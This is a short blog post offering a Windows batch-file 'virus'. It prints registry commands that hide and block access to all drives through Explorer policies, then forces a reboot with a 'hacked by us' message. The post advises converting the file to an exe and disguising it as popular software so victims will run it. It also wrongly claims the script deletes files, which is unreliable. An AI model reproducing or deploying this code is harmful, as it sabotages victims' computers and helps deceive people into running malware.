Virus to disable all Hard Disk using Batch Programming

 This is a simple batch program to disable the hard disks in windows.

NOTE:  Don't run or execute the bat file after creating it because it will delete the files from your computer only.  

1. Copy the code present in box below in the NOTEPAD. 


REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

2. Save the file with .bat extension(for eg:disableall.bat)

3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.

For more info, Contact me.

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...
 
Download & Learning © 2011 | Contact